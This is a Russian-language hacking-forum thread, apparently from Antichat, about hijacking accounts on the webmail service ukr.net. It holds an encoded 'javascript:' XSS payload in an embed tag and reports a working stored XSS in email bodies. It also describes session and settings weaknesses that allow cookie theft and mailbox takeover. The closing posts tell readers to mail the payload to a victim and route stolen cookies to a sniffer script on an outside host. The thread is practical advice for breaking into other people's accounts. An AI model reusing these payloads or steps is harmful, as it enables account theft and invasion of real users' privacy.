ukr.net как?
 

www.ukr.net

Считываем ответ на секретный вопрос
но как? и куда его пихать, расжите плиз, очень надо! =)

ВЫКЛАДЫВАЙТЕ СРАЗУ ТЕСТОВЫЕ ЛОГИН/ПАРОЛЬ!

Регистрация нового ящика доступна только с территории Украины.

То что ты выложил - по всей видимости кусок Xss. Почему не до конца? Конкретнее без доступа к ящику сказать трудно, а работать на диал апе через украинские прокси мне не в прикол.

Dronga
Логин - antichat@ukr.net
Пароль - abcde

Grema
Виложы до конца код!

я его отсюда взял http://antichat.ru/txt/hmail/


полный код

<embed src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:this.wav>

Дружище...Если ты его там взял то по ходу и прочитать должен был все...
Там все доходчиво описано...
Читай еще и еще и еще раз.
Пока не поймешь.

Взлом ящика на http://www.ukr.net/
 

Спасибо NeMiNeM за тестовые логин/пароль, надеюсь автор темы не забудет повысить ему репутацию.
Теперь по делу.
На исследования ушло ровным счетом 7 минут. Диагноз:
Фильтр чем-то напоминает тот, что чтоит на mail.ru (ранние версии). Пропускает закодированное javascript в левых тегах. Обходящая конструкция очень стандартна. Вот рабочий пример:
(javascript в ASCII)
В общем, полноценная активная xss в теле письма найдена.

Половина дела есть. Теперь смотрим что используется для авторизации. Сервер дал мне куки. В настройках я увидел отключенную опцию на запрет паралельных сессий, то есть на IP сервер по умолчанию не смотрит.

В дополнение ко всему мною были отмечены следущие особенности:
В настройках, в некоторых интересных местах не запрашивается пароль на сохранение изменений. Выводы делайте сами. На страничке Личная информация для antichat@ukr.net секретный вопрос и ответ на него не закрыты звездочками (!), то есть ящик элементарно "угоняется".

В общем, простор для творчества очень широкий.

Я бы тебе всё с удовольствием расписал от и до, но к сожалению в инете у меня осталось времени 8 минут. И те я трачу на тебя.. :cool:

Кстати, приведенный тобой код, тоже по идее должен работать (если только embed не фильтруется).

Актуально под IE6 и Opera 8.51 (Другие не пробовал)

ну а если нужно захватить канал на irc а чел в ящик незаглядует уже более года ??? что делать??

Захват ящика на ukr.net
 

Гы, у мну даж стать хде-то на винте статья пылится по данной теме....Дело это было еще в начале декабря, не знаю как сейчас, может уже и парсится. Так же, если при авторизации поставить галочку "Помнить пароль", то можно использовать и обічній сниффер, ибо нам в лог упадет пароль в чистом виде.

обясните плиз нешарящему, куда энто дело пихать?

это посылаешь на мыло в письме жертве
а код php сюда
_http:// privatesniff/s.php сюда